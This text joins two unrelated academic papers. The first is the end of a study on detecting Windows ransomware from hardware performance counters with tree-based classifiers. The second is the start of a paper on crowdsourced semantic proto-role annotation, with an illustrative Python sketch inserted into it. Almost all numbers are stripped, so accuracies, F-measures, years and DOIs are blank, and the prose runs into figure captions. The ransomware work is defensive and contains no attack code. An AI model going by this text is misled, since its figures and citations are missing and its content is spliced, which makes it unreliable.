\text{F-measure} = \frac{2 \times \text{Precision} \times \text{Recall}}{\text{Precision} + \text{Recall}} \qquad (4)

Receiver operating characteristic (ROC) curves (Metz, ; Dion & Brohi, ) are widely applied to measure the accuracy of trained machine learning models (Bradley, ). Furthermore, ROC curves are applied in numerous systematic approaches that merge multiple clues, test results, etc., and are plotted and evaluated to characterize a qualitative feature of the classifier under evaluation. An ROC curve plots the true positive rate (TPR) on the y-axis against the false positive rate (FPR) on the x-axis. The TPR is the fraction of actual positive cases that the classifier predicts as positive, whereas the FPR is the fraction of actual negative cases that the classifier incorrectly labels as positive. Both TPR and FPR values lie between 0 and 1.

The results based on the decision tree classifier can be seen in Fig. . The ROC curve for both classes (i.e., ransomware and non-ransomware) is the same, having a value of . , which signifies excellent prediction. However, the precision-recall curve for the non-ransomware class shows an accuracy of . , whereas for the ransomware class the accuracy is . . The F-measure score of the decision tree is . , as shown in Table . The results obtained using the random forest classifier for the two classes (i.e., ransomware and non-ransomware) are shown in Fig. , and the F-measure score is illustrated in Table . The higher accuracy is evident from the similar ROC curve value, that is, . , for both the ransomware and non-ransomware classes.
the roc curve and precision-recall curve of both classes (i.e., ransomware and non-ransomware) are the same (i.e., . ). the extreme gradient boosting based model’s f-measure score is . , which is similar to the gradient boosting and random figure gradient boosting performance metrics behavior: (a) roc curves for the classes and . (b) precision-recall curves for the classes and . full-size doi: . /peerj-cs. /fig- table gradient boosting precision, recall and f-measure score for malware classes. malware class precision recall f-measure ransomware (class label ) . . . non-ransomware (class label ) . . . figure extreme gradient boosting performance metrics behavior: (a) roc curves for the classes and . (b) precision-recall curves for the classes and . full-size doi: . /peerj-cs. /fig- aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forest-based classification as shown in table . the random forest-based classification model outperformed decision tree-based classification by attaining the accuracy of . , as shown in table . however, the value of the f-measure for both the classes is . (as shown in table ). the model has attained an improvement of % than the decision tree-based classification. the model shows similar f-measure results of . as observed for random forest and extreme gradient boosting. this study has demonstrated the possibility of exploiting hpcs as the potential features for ransomware detection. after analyzing the sets of ransomware and non- ransomware, the features obtained from hpcs have been analyzed to classify malicious applications into ransomware and non-ransomware categories using several machine learning algorithms such as decision tree, random forest, gradient boosting and extreme gradient boosting. the results of detailed experiments as stated earlier in the section have revealed that extracted hardware features play a significant role in the detection and identification of ransomware. among all the employed machine learning classifiers, the random forest-based model and extreme gradient boosting have outperformed by yielding f-measure score of . followed by a decision tree that achieved . f-measure. moreover, the features cache misses, task clock, and branches obtained through hpcs could be deemed as potential parameters in classifying ransomware from non- ransomware. conclusions in this article, the analysis of hpcs has been presented for windows ransomware classification. the results have revealed that the hpcs hold the considerable potential to expose hidden indicators of the executing applications such as malicious codes and ransomware. performance counters, that is, cache misses, task clock and branches have played a pivotal role in classifying ransomware in a way that if there are a high number of cache misses or a high number of branch mispredictions (where control flow becomes detectably anomalous) are good indicators that help in indicating a potential attack (foreman, ). the proposed technique holds adequate potential to provide sufficient table extreme gradient boosting precision, recall and f-measure score for malware. malware class precision recall f-measure ransomware (class label ) . . . non-ransomware (class label ) . . . table four classifiers result and their comparison f-measure score. classifier f-measure decision tree . random forest . gradient boosting . extreme gradient boosting . 
aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ detection accuracy by attaining the f-measure score of . . this study demonstrated the possibility of exploiting hpcs as the potential feature for the detection of ransomware. however, this topic needs further investigation. in the future, we intend to scrutinize other dynamic features with the combination of call graphs to detect and classify ransomware. moreover, the application of machine learning algorithms has shown very promising results in ransomware detection. in the future, we will expand this study to perform in-depth static analysis as well as dynamic analysis with the combination of hpcs in the detection of that ransomware that usually hides by implementing various obfuscation techniques (like packed or compressed programs, or indirect addressing (behera & bhaskari, )). one major challenge and limitation of this research is in ransomware detection of false positives and false negatives. consider the case of qwerty ransomware, which uses a benign gpg executable to perform encryption. perhaps the proposed solution would correctly detect the gpg binary when used in this way, but we suspect it would also detect it in a benign case. since in this work we did not evaluate benign executables, it is not clear how the system performs with software that performs encryption and/or compression tasks which is the limitation of this research that will be investigated in our future work. moreover, the collected features are related to hardware-specific environments, so if the system having the same architecture then the trained classification models are applicable as it is. however, in case the hardware environment is different (i.e., different architecture) then we have to retrain our machine learning models for that specific hardware environment. this is one of the limitations of our proposed work that the machine learning models trained on specific architecture are not portable across other machine architectures. moreover, due to the modest dataset deep learning mechanism at present are not applicable. however, in the future, we intend to extend our dataset to implement more robust auto denoising encoders, which comprises of multiple layers of neural networks and are best-known for providing good accuracy. additional information and declarations funding the work was partially funded by deanship of graduate studies and research (dgsr), ajman university, uae. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: deanship of graduate studies and research (dgsr). competing interests muhammad aleem is an academic editor for peerj. aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � sana aurangzeb conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � rao naveed bin rais conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. 
� muhammad aleem conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � muhammad arshad islam conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � muhammad azhar iqbal conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data and sample python script are available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahmadian mm, shahriari hr, ghaffarian sm. . connection-monitor & connection-breaker: a novel approach for prevention and detection of high survivable ransomwares. new york: ieee, – . al-rimy bas, maarof ma, shaid szm. . a -day aware crypto-ransomware early behavioral detection framework. cham: springer, – . al-rimy bas, maarof ma, shaid szm. . ransomware threat success factors, taxonomy, and countermeasures: a survey and research directions. computers & security : – doi . /j.cose. . . . alam m, sinha s, bhattacharya s, dutta s, mukhopadhyay d, chattopadhyay a. . rapper: ransomware prevention via performance counters. arxiv available at http://arxiv.org/ abs/ . . ali a. . ransomware: a research and a personal case study of dealing with this nasty malware. issues in informing science and information technology : – doi . / . alzahrani n, alghazzawi d. . a review on android ransomware detection using deep learning techniques. in: proceedings of the th international conference on management of digital ecosystems. – . anderson d, thane f, alfonso v. . next-generation intrusion detection expert system (nides): a summary. computer science laboratory sri-csl- - . available at http://www.csl.sri.com/papers/ sri/ sri.pdf. andronio n, zanero s, maggi f. . heldroid: dissecting and detecting mobile ransomware. new york: springer international publishing, – . aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cose. . . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / http://www.csl.sri.com/papers/ sri/ sri.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ aurangzeb s, aleem m, iqbal ma, islam ma. . ransomware: a survey and trends. journal of information assurance and security : – . bahador mb, abadi m, tajoddin a. . hpcmalhunter: behavioral malware detection using hardware performance counters and singular value decomposition. new york: ieee, – . bahador mb, abadi m, tajoddin a. . hlmd: a signature-based approach to hardware-level behavioral malware detection and classification. journal of supercomputing ( ): – doi . /s - - -z. basu k, krishnamurthy p, khorrami f, karri r. . a theoretical study of hardware performance counters-based malware detection. ieee transactions on information forensics and security : – doi . /tifs. . . behera ck, bhaskari dl. . different obfuscation techniques for code protection. procedia computer science : – doi . /j.procs. . . . beneventi f, bartolini a, cavazzoni c, benini l. . 
continuous learning of hpc infrastructure models using big data analytics and in-memory processing tools. new york: ieee, – . black p, sohail a, gondal i, kamruzzaman j, vamplew p, watters p. . api based discrimination of ransomware and benign cryptographic programs. in: international conference on neural information processing. cham: springer, – . bradley a. . the use of the area under the roc curve in the evaluation of machine learning algorithms. pattern recognition ( ): – doi . /s - ( ) - . brewer r. . ransomware attacks: detection, prevention and cure. network security ( ): – doi . /s - ( ) - . chen z, kang h, yin s, kim s. . automatic ransomware detection and analysis based on dynamic api calls flow graph. in: proceedings of the international conference on research in adaptive and convergent systems, – doi . / . . chen q, robert ab. . automated behavioral analysis of malware: a case study of wanna cry ransomware. arxiv available at http://arxiv.org/abs/ . . chen t, tong h. . xgboost: extreme gradient boosting. r package v . . . , – . available at http://cran.fhcrc.org/web/packages/xgboost/vignettes/xgboost.pdf. chiappetta m, savas e, yilmaz c. . real time detection of cache-based side-channel attacks using hardware performance counters. applied soft computing : – doi . /j.asoc. . . . chung m. . why employees matter in the fight against ransomware. computer fraud & security ( ): – doi . /s - ( ) - . das s, werner j, antonakakis m, polychronakis m, monrose f. . sok: the challenges, pitfalls, and perils of using hardware performance counters for security. in: ieee symposium on security and privacy. piscataway: ieee, – . davies sr, macfarlane r, buchanan wj. . evaluation of live forensic techniques in ransomware attack mitigation. forensic science international: digital investigation : doi . /j.fsidi. . . demme j, maycock m, schmitz j, tang a, waksman a, sethumadhavan s, stolfo s. . on the feasibility of online malware detection with performance counters. acm sigarch computer architecture news ( ): – doi . / . . de melo ac. . the new linux 'perf' tools. in: slides from linux kongress. vol. . available at http://www.linux-kongress.org/ /slides/lk -perf-acme.pdf. dion y, brohi sn. . an experimental study to evaluate the performance of machine learning algorithms in ransomware detection. journal of engineering science and technology ( ): – . flater d. . screening for factors affecting application performance in profiling measurements. us department of commerce, national institute of standards and technology, report number: nist tn doi . /nist.tn. . foreman jc. . a survey of cyber security countermeasures using hardware performance counters. arxiv available at http://arxiv.org/abs/ . . friedman jh. . reitz lecture—greedy function approximation: a gradient boosting machine. annals of statistics ( ): – . gazet a. . comparative analysis of various ransomware virii. journal in computer virology ( ): – doi . /s - - - .
grant l, parkinson s. . identifying file interaction patterns in ransomware behaviour. in: parkinson s, crampton a, hill r, eds. guide to vulnerability analysis for computer networks and systems. computer communications and networks. cham: springer, – . hampton n, baig z, zeadall s. . ransomware behavioural analysis on windows platform. journal of information security and applications : – doi . /j.jisa. . . . jbabdi s, sotiropoulos sn, savio am, graña m, behrens te. . model-based analysis of multishell diffusion mr data for tractography: how to get over fitting problems. magnetic resonance in medicine ( ): – doi . /mrm. . jordan mi, mitchell tm. . machine learning: trends, perspectives, and prospects. science ( ): – doi . /science.aaa . kadiyala sp, jadhav p, lam sk, srikanthan t. . hardware performance counter-based fine-grained malware detection. acm transactions on embedded computing systems ( ): – . kaur g, dhir r, singh m. . anatomy of ransomware malware: detection, analysis and reporting. international journal of security and networks ( ): – doi . /ijsn. . . kharraz a, arshad s, mulliner c, robertson wk. . unveil: a large-scale, automated approach to detecting ransomware. in: usenix security symposium. – . kharraz a, robertson w, balzarotti d, bilge l, kirda e. . cutting the gordian knot: a look under the hood of ransomware attacks. in: international conference on detection of intrusions and malware, and vulnerability assessment. cham: springer, – . kim d, soh w, kim s. . design of quantification model for prevent of cryptolocker. indian journal of science and technology ( ):e doi . /ijst/ /v i / . kimberly t, salahuddin jk, aristide f, lorenzo c. . copperdroid: automatic reconstruction of android malware behaviors. ndss symposium : – . kohavi r. . scaling up the accuracy of naive-bayes classifiers: a decision-tree hybrid. in: kdd proceedings. citeseer, . kok s, abdullah a, jhanjhi n, supramaniam m. . ransomware, threat and detection techniques: a review. international journal of computer science and network security ( ): . kouliaridis v, kambourakis g. . feature importance in mobile malware detection. arxiv preprint arxiv: . . kuruvila ap, kundu s, basu k. . analyzing the efficiency of machine learning classifiers in hardware-based malware detectors. in: ieee computer society annual symposium on vlsi (isvlsi). piscataway: ieee, – . kuznetsova i, karpievitch yv, filipovska a, lugmayr a, holzinger a. . review of machine learning algorithms in differential expression analysis. arxiv preprint arxiv: . . lee jk, moon sy, park jh. . cloudrps: a cloud analysis based enhanced ransomware prevention system. journal of supercomputing ( ): – doi . /s - - - . li j, cheng k, wang s, morstatter f, trevino rp, tang j, liu h. . feature selection: a data perspective. acm computing surveys ( ): – . liaw a, wiener m. . classification and regression by randomforest. r news ( ): – . liu x, liu j. . a two-layered permission-based android malware detection scheme. in: nd ieee international conference on mobile cloud computing, services, and engineering. piscataway: ieee, – . maiorca d, mercaldo f, giacinto g, visaggio ca, martinelli f. .
r-packdroid: api package-based characterization and detection of mobile ransomware. in: proceedings of the symposium on applied computing. – . malone c, zahran m, karri r. . are hardware performance counters a cost effective way for integrity checking of programs. in: proceedings of the sixth acm workshop on scalable trusted computing. new york: acm, – . maurya a, kumar n, agrawal a, khan r. . ransomware: evolution, target and safety measures. international journal of computer sciences and engineering ( ): – . metz ce. . basic principles of roc analysis. seminars in nuclear medicine ( ): – doi . /s - ( ) - . mucci pj, browne s, deane c, ho g. . papi: a portable interface to hardware performance counters. in: proceedings of department of defense hpcmp users group conference. narudin fa, feizollah a, anuar nb, gani a. . evaluation of machine learning classifiers for mobile malware detection. soft computing ( ): – doi . /s - - - . or-meir o, nissim n, elovici y, rokach l. . dynamic malware analysis in the modern era—a state of the art survey. acm computing surveys ( ): – doi . / . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j. . scikit-learn: machine learning in python. journal of machine learning research : – . ramesh g, menen a. . automated dynamic approach for detecting ransomware using finite-state machine. decision support systems : doi . /j.dss. . . scalas m, maiorca d, mercaldo f, visaggio ca, martinelli f, giacinto g. . on the effectiveness of system api-related information for android ransomware detection. computers & security : – doi . /j.cose. . . . sgandurra d, muñoz-gonzález l, mohsen r, lupu ec. . automated dynamic analysis of ransomware: benefits, limitations and use for detection. arxiv preprint arxiv: . v . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint arxiv: . . singh b, evtyushkin d, elwell j, riley r, cervesato i. . on the detection of kernel-level rootkits using hardware performance counters. in: proceedings of the acm on asia conference on computer and communications security. – . song s, kim b, lee s. . the effective ransomware prevention technique using process monitoring on android platform. advances in mobile security technologies ( ): – doi . / / . tan pn, steinbach m, kumar v. . classification: basic concepts, decision trees, and model evaluation. introduction to data mining : – . victoriano ob. . exposing android ransomware using machine learning. in: proceedings of the international conference on information system and system management. – . wang x, chai s, isnardi m, lim s, karri r. . hardware performance counter-based malware identification and detection with adaptive compressive sensing. acm transactions on architecture and code optimization ( ): – . weaver vm. . linux perf_event features and overhead. in: the nd international workshop on performance analysis of workload optimized systems. vol. . urbandale: fastpath. xu z, ray s, subramanyan p, malik s. . malware detection using machine learning based analysis of virtual memory access patterns.
in: proceedings of the conference on design, automation & test in europe. – . xuan s, liu g, li z, zheng l, wang s, jiang c. . random forest for credit card fraud detection. in: ieee th international conference on networking, sensing and control. piscataway: ieee, – . yang t, yang y, qian k, tao l. . automated detection and analysis for android ransomware. new york: ieee, – . zavarsky p, lindskog d. . experimental analysis of ransomware on windows and android platforms: evolution and characterization. procedia computer science : – doi . /j.procs. . . . zhang h, xiao x, mercaldo f, ni s, martinelli f, sangaiah ak. . classification of ransomware families with machine learning based on n-gram of opcodes. future generation computer systems : – doi . /j.future. . . . zhang m, xu b, wang d. . an anomaly detection model for network intrusions using one-class svm and scaling strategy. cham: springer, – . zhang x, zhao j, lecun y. . character-level convolutional networks for text classification. in: advances in neural information processing systems. – . zhou b, gupta a, jahanshahi r, egele m, joshi a. . hardware performance counters can detect malware: myth or fact? in: proceedings of the on asia conference on computer and communications security. – .
semantic proto-roles drew reisinger rachel rudinger francis ferraro craig harman kyle rawlins∗ benjamin van durme∗ {rawlins@cogsci, vandurme@cs}.jhu.edu johns hopkins university abstract we present the first large-scale, corpus-based verification of dowty's seminal theory of proto-roles.
our results demonstrate both the need for and the feasibility of a property-based annotation scheme of semantic relationships, as opposed to the currently dominant notion of categorical roles. introduction. for decades researchers have debated the number and character of thematic roles required for a theory of the syntax/semantics interface. agent and patient are canonical examples, but questions emerge such as: should we have a distinct role for beneficiary? what about recipient? what are the boundaries between these roles? and so on. dowty ( ), in a seminal article, responded to this debate by constructing the notion of a proto-agent and proto-patient, based on entailments that can be mapped to questions, such as: "did the argument change state?", or "did the argument have volitional involvement in the event?". dowty argued that these properties group together in the lexicon non-categorically, in a way that aligns with classic agent/patient intuitions. for instance, a proto-patient often both changes state (but might not), and often is causally affected by another participant. various resources have been developed for computational linguists working on 'semantic role labeling' (srl), largely under the classical, categorical notion of role. here we revisit dowty's research as computational linguists desiring data for a new task, semantic proto-role labeling (sprl), in which existing coarse-grained categorical roles are replaced by scalar judgements of dowty-inspired properties. (to be clear, dowty himself does not make direct predictions about the distribution of proto-role properties within a corpus, except insofar as a corpus is representative of the lexicon.) as the availability of supporting data is a critical component of such a task, much of our efforts here are focused on showing that everyday english speakers (untrained annotators) are able to answer basic questions about semantic relationships. in this work we consider the following questions: (i) can crowdsourcing methods be used to empirically validate the formal linguistic theory of dowty, following prior work in psycholinguistics (kako, b)? (ii) how might existing semantic annotation efforts be used in such a pursuit? (iii) can the pursuit of dowty's semantic properties be turned into a practical and scalable annotation task? (iv) do the results of such an annotation task (at various scales, including over very large corpora) continue to confirm dowty's proto-role hypothesis? and finally, (v) how do the resulting configurations of fine-grained role properties compare to coarser annotated roles in resources such as verbnet? we first derive a set of basic semantic questions pertaining to dowty-inspired properties. these questions are used in two mechanical turk hits that address the above issues. in the first hit, we build on psycholinguistic work (kako, b) to directly access 'type-level' intuitions about a lexical item, by asking subjects property-questions using made-up ("nonce") words in argument positions. our results replicate these previous experiments, and demonstrate that what can be done in this domain in a controlled lab experiment can be done via crowdsourcing.
we extend this to a large-scale mturk annotation task using corpus data. this task presents an annotator with a particular ('token-level') sentence from propbank (palmer et al., ) and a highlighted argument, and asks them for a likelihood judgment about a property; for example, "how likely or unlikely is it that arg is sentient?". by looking across many token-level instances of a verb, we can then infer type-level information about the verb. we discuss results from this task over role properties annotated by a single (trusted) annotator on approximately verb tokens. our results represent the first large-scale corpus study explicitly aimed at confirming dowty's proto-role hypothesis: proto-agent properties predict the mapping of semantic arguments to subject and object. we show that this allows us to both capture and discover fine-grained details of semantic roles that coarser annotation schemes such as verbnet do not: empirically, this data set shows a great degree of role fragmentation, much greater than any existing annotation scheme allows. the results of this task represent a new large-scale annotated resource, involving close to hours of human effort (available through the jhu decompositional semantics initiative (decomp): http://decomp.net). background. roles in linguistics. thematic roles have been a key analytical component in modern linguistic theory. despite the vast literature, there is surprisingly little consensus over what a thematic role is, or how to identify or precisely characterize them. a 'textbook' approach, influential in linguistics and computer science, is that there is a (short) list of core generalized thematic roles, such as agent, patient, experiencer, etc., that verbs assign to arguments. (a full accounting of the history of thematic roles is beyond the scope available here; see blake, ; gruber, ; fillmore, ; ; ; castañeda, ; jackendoff, ; ; cruse, ; talmy, ; chomsky, ; carlson, ; carlson and tanenhaus, ; rappaport and levin, ; rappaport hovav and levin, ; levin and rappaport hovav, ; dowty, ; ; parsons, ; croft, ; davis and koenig, , among others.) however, it has been known for some time that this view is problematic (see levin and rappaport hovav ( ) for an overview). perhaps the best known arguments emerge from the work of david dowty. proto-roles. dowty ( ), in an exhaustive survey of research on thematic roles up to that point, identifies a number of problems with generalized thematic roles. first and foremost, if the inventory of role types is small, then it proves impossible to clearly delineate the boundaries between role types. this situation pushes researchers who want clean role boundaries towards a very large inventory of specialized, fine-grained thematic roles – what dowty termed role fragmentation. a large, fragmented set of role-types may be useful for many purposes, but not for expressing generalizations that should be stated in terms of thematic roles. dowty ( ) focuses on generalizations related to the mapping problem: how are syntactic arguments mapped to semantic arguments? the mapping problem is not just a linguistic puzzle, but a central problem for tasks such as srl, semantic parsing, etc. dowty offers a solution to the mapping problem couched not in terms of fine-grained fragmented thematic roles, but in terms of what dowty analogizes to 'prototype' concepts constructed over fine-grained role properties.
in particular, the role properties are features such as whether the participant in question causes the event to happen, or whether the participant changes state. dowty groups properties into two classes: proto-agent properties, and proto-patient properties. a semantic argument is more agent-like the more proto-agent properties it has, and more patient-like the more proto-patient properties it has. these two sets of properties are in competition, and an argument can have some of each, or even none of the properties. dowty's role properties (slightly modified) are shown in table ; we use these as a starting point for our own choice of fine-grained features in § . classic role types fall out from what we will term configurations of these properties. (dowty's argument selection principle: "in predicates with grammatical subject and object, the argument for which the predicate entails the greatest number of proto-agent properties will be lexicalized as the subject of the predicate; the argument having the greatest number of proto-patient entailments will be lexicalized as the direct object." (dowty : ))
table : proto-role properties (dowty : – ).
proto-agent properties: a. volitional involvement; b. sentience (/perception); c. causes change of state; d. movement (relative); e. independent existence.
proto-patient properties: f. changes state; g. incremental theme; h. causally affected; i. stationary (relative); j. no independent existence.
a 'core' agent, for example, would have all of the proto-agent properties. an experiencer would have proto-agent properties (b) and (e), and proto-patient property (h), and so would be less agent-like than a core agent. this idea is further developed by grimm ( ; ), who points out that when combinations of proto-role properties are looked at as a lattice structure, generalized thematic roles can be identified with particular parts of the lattice. if dowty's proposal is right, the lexicon will instantiate a very large number of property configurations, rather than a small and constrained set. a key result of this theory is explanation of the contrast between what dowty terms stable and unstable predicates. a stable predicate is one like kill whose mapping behavior is similar across languages – the killer is mapped to subject, and the victim to object. an unstable predicate is one where this is not so. instability can also manifest within a language, in the form of lexical doublets such as buy and sell. the proto-patient argument for these verbs is stable, but the subject alternates: for buy it is the goal argument that appears as subject while for sell it is the source. dowty's explanation is that for transaction events, source and goal are very similar in their proto-agent properties, and so compete equally for subject position. dowty's linguistic proposal, if correct, has substantial implications for human language technology (see also discussion in palmer et al. ( )). it suggests an approach to semantic annotation, semantic parsing, and related tasks that focuses on this fine-grained level of proto-role properties, with any more generalized thematic roles as emergent property configurations.
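as a concrete illustration of how the argument selection principle operates over table , the following minimal sketch (in python) counts proto-agent and proto-patient entailments per argument and predicts which argument surfaces as subject and which as object. the property names and the example entailment sets are invented for illustration; this is not code or data from the paper.

# proto-role property sets, following table 1 (names are illustrative identifiers)
PROTO_AGENT = {"volition", "sentience", "causes_change_of_state",
               "movement", "independent_existence"}
PROTO_PATIENT = {"changes_state", "incremental_theme", "causally_affected",
                 "stationary", "no_independent_existence"}

def predict_mapping(entailments):
    """entailments: dict mapping argument name -> set of entailed properties.
    returns (predicted subject, predicted object) per the selection principle."""
    subject = max(entailments, key=lambda a: len(entailments[a] & PROTO_AGENT))
    obj = max(entailments, key=lambda a: len(entailments[a] & PROTO_PATIENT))
    return subject, obj

# hypothetical entailments for a transitive predicate like "break":
args = {
    "breaker": {"volition", "sentience", "causes_change_of_state",
                "movement", "independent_existence"},
    "broken_thing": {"changes_state", "causally_affected", "incremental_theme"},
}
print(predict_mapping(args))  # -> ('breaker', 'broken_thing')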
if lexical argument structure is organized around proto-roles, then we predict that we will find this organization reflected in corpora, and that token-level annotations of verb meanings would benefit from observing this organization. in particular, an annotation strategy that takes the proto-role hypothesis seriously would annotate verbs for properties such as those shown in table .
figure : proto-role properties in kako exp. (reproduction of kako's fig. ). error bars in all figures show % t-test cis.
experimental work. can the proto-role hypothesis be operationalized? a starting point is experimental work by kako ( a,b), who took the proto-role hypothesis into the lab. kako developed several experimental versions of the hypothesis, whereby participants were asked simplified question-based versions of dowty's proto-role properties about sentences of english. kako did not use actual or attested sentences of english, but rather focused on 'nonce'-based tasks. that is, he constructed stimuli by taking constructed sentences of english containing the target verbs, and replacing noun positions with nonce words like dax. subjects were then presented with these nonce sentences and asked questions such as, "how likely is it that the dax moved?". the nonce-method is designed to access 'type-level' judgments about verbs across frames. across all experiments, kako confirms a version of the proto-role hypothesis: subject arguments across the verbs he examines have significantly more proto-agent than proto-patient properties, and vice versa for objects. fine-grained results for individual proto-role properties from one of his experiments are shown in figure : this presents an aggregate measure of the success of the proto-role hypothesis, showing the mean difference between property ratings for subject vs. object arguments. dowty's mapping hypothesis predicts that subjects should skew towards proto-agent properties, and objects towards proto-patient properties, exactly kako's finding. kako's work helped lead alishahi and stevenson ( ) to annotate a small collection of child directed speech with dowty-inspired properties, used to evaluate a bayesian model for inducing what they termed semantic profiles (probability distributions over observed configurations that capture a generalized notion of semantic (proto-)role). roles in computational linguistics. propbank. propbank (palmer et al., ) layers predicate/argument annotations on the english portion of the penn treebank (ptb) (marcus et al., ), treating semantic role annotation as a sort of slot-filling exercise: a frameset defines a set of semantic roles that a particular type of predicate may use. every verb is assigned a frameset (roughly, a verb sense), and arguments of the verb (potentially a non-contiguous span) are labeled with a particular role. coarse categorical labels, such as arg and arg , allow propbank to both capture some of levin ( )'s syntactic variations, and imbue this syntactic information with shallow semantics. annotations do not cross sentence boundaries. as every verb in the ptb was annotated, propbank has good coverage: , framesets cover around , verb types. additional resources have adopted and extended propbank, e.g. (weischedel et al., , etc.), and there have been multiple shared tasks centered around propbank-style srl (carreras and màrquez, ).
however, at three days (palmer et al., ), the training time for an annotator is significantly higher than for the crowdsourcing solution we pursue here. verbnet and semlink. verbnet (schuler, ) provides a class-based view of verbs. it applies levin's verb classes (levin, ) to more than five thousand (english) verbs, categorizing them according to their syntactic behaviors. (this section is not a fully exhaustive list of resources, and we omit discussion of several important ones that are complementary to our efforts. for example, resources such as the pattern dictionary of english verbs (hanks, ), currently in progress, could be supplemented by our sprl annotations; the pdev will contain valency patterns for thousands of verbs along with restrictions on the semantic types of their arguments based on (pustejovsky et al., )'s ontology. also important is early connectionist work, which proposed "semantic microfeatures" to model semantic role generalizations; see e.g. hinton ( ; ) and mcclelland and kawamoto ( ).) beyond this grouping, which includes a shallow semantic parse frame, verbnet provides its own semantic role labels, and a neo-davidsonian-inspired logical form. all information within verbnet is class-specific; the frames and roles apply equally to all verbs within a class. (for instance, the lemmas break and shatter are both members of the same class (break- . ), capturing the causative alternation. both senses can be used transitively ("john broke/shattered the mirror") or intransitively ("the mirror broke/shattered."), while semantic roles assign john to agent and the mirror to patient in both syntactic frames, capturing the logical entailment of a resulting degraded physical form.) further, verbnet's lexical entries allow for assigning selectional restrictions on thematic roles, e.g. requiring a participant be concrete, or animate. while these restrictions take the form of properties, the thematic roles themselves are left categorical. bonial et al. ( ) united verbnet's semantic roles with those of lirics (linguistic infrastructure for interoperable resources and systems: http://lirics.loria.fr/), a standardization effort to facilitate multilingual nlp. motivated in part by the properties of dowty, they constructed a hierarchy of roles interrelated through their property requirements, implicit in the organization of the hierarchy paired with natural language role definitions. the properties bundled into these roles are then taken to be type-level, hard constraints: they cannot reflect semantic nuances within individual sentences, and are strictly boolean (a property cannot hold to a degree, or with some uncertainty). the semlink project (loper et al., ) provides a mapping between verbnet, propbank, framenet (see below) and wordnet (fellbaum, ). crucially for our work (see § ), semlink provides a mapping from the role hierarchy of bonial et al. ( ) to the argument annotations of propbank. verbcorner. verbcorner (hartstone et al., ; hartshorne et al., ) is an on-going effort to validate verbnet's semantic annotations, focusing at a finer-grained level of role information. for a particular verb and semantic features, annotators are provided context through a small, made-up story. annotators then read example sentences pulled from verbnet and determine whether those sentences violate the contextual expectations. as with the present work, verbcorner crowd-sources the
annotation, though there are key differences: hartstone et al. ( ) are focused on logical entailments (what must be true) whereas we are focused on strongly suggested implications (what is likely to be true). framenet. the berkeley framenet project (baker et al., ) is an instantiation of fillmore's frame semantic theory (fillmore, ). framenet describes events via a frame, consisting of lexical triggers and semantic roles that are expected to be filled. this is similar to propbank's take on predicate/argument structure, though there are significant differences: ( ) framenet triggers may be multiword, verbal or nominal expressions; ( ) unlike propbank, framenet defines interframe relations; ( ) framenet is extremely fine-grained (embraces role-fragmentation), opting for semantic completeness rather than annotator ease. framenet has inspired semantic role labeling (gildea and jurafsky, ; litkowski, ), in addition to frame semantic parsing (baker et al., ; das et al., ). experimental setup. the literature review makes clear that understanding and annotating fine-grained role properties is valuable in both linguistic theory and in computational linguistics: under many sets of assumptions, such properties ground out the theory of coarse-grained roles. we follow hartstone et al. ( ) in directly addressing fine-grained properties, here in the context of the proto-role theory. the proto-role approach gives us a set of testable questions to assess on a corpus. we focus on two main issues: (i) whether the proto-role solution to the mapping problem scales up to very large sets of data, and (ii) the prediction that there will be a very large set of property configurations attested as roles in a large data set. if the predictions from the proto-role theory are true, then we conclude that a large data set annotated with fine-grained role properties may be valuable in tasks related to semantic roles and event detection. to assess these predictions, we broadly follow kako ( b) in operationalizing proto-roles using likelihood questions targeting specific role properties in sentences of english. this paper presents two experiments that implement this strategy. in the remainder of this section we describe the general setup of the experiments. in particular, we describe a process for arriving at the specific fine-grained property questions we ask, the creation of the data set that we ask the questions about, the task that mechanical turkers are presented with, and the manner in which we analyze and display the results.
table : questions posed to annotators (each asks "how likely or unlikely is it that...").
instigated: arg caused the pred to happen?
volitional: arg chose to be involved in the pred?
awareness: arg was/were aware of being involved in the pred?
sentient: arg was sentient?
moved: arg changes location during the pred?
phys existed: arg existed as a physical object?
existed before: arg existed before the pred began?
existed during: arg existed during the pred?
existed after: arg existed after the pred stopped?
changed poss: arg changed possession during the pred?
changed state: the arg was/were altered or somehow changed during or by the end of the pred?
stationary: arg was stationary during the pred?
we first inspected the role hierarchy of bonial et al. ( ) along with the associated textual definitions: these were manually decomposed into a set of explicit binary properties.
